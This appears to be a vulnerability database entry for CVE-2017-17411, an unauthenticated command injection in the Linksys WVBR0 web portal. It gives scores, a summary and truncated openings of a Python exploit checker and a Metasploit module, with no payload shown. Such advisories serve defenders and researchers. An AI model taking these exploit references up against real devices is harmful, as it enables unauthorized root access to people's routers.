CVE-2017-17411

Published: 21/12/2017 Updated: 28/08/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

This vulnerability allows remote malicious users to execute arbitrary code on vulnerable installations of Linksys WVBR0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issue lies in the lack of proper validation of user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges. Was ZDI-CAN-4892.

Vulnerable Product

linksys wvbr0_firmware

Exploits

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Nixawk
# CVE-2017-17411
# Linksys WVBR0 25 Command Injection
"""
$ python27 exploit-CVE-2017-17411.py
[*] Usage: python exploit-CVE-2017-17411.py <URL>
$ python27 exploit-CVE-2017-17411.py example.com/
[+] Target is exploitable by CVE-2017-17411
"""
import requests
def check(u ...

##
# This module requires Metasploit: metasploit.com/download
# Current source: github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Linksys W ...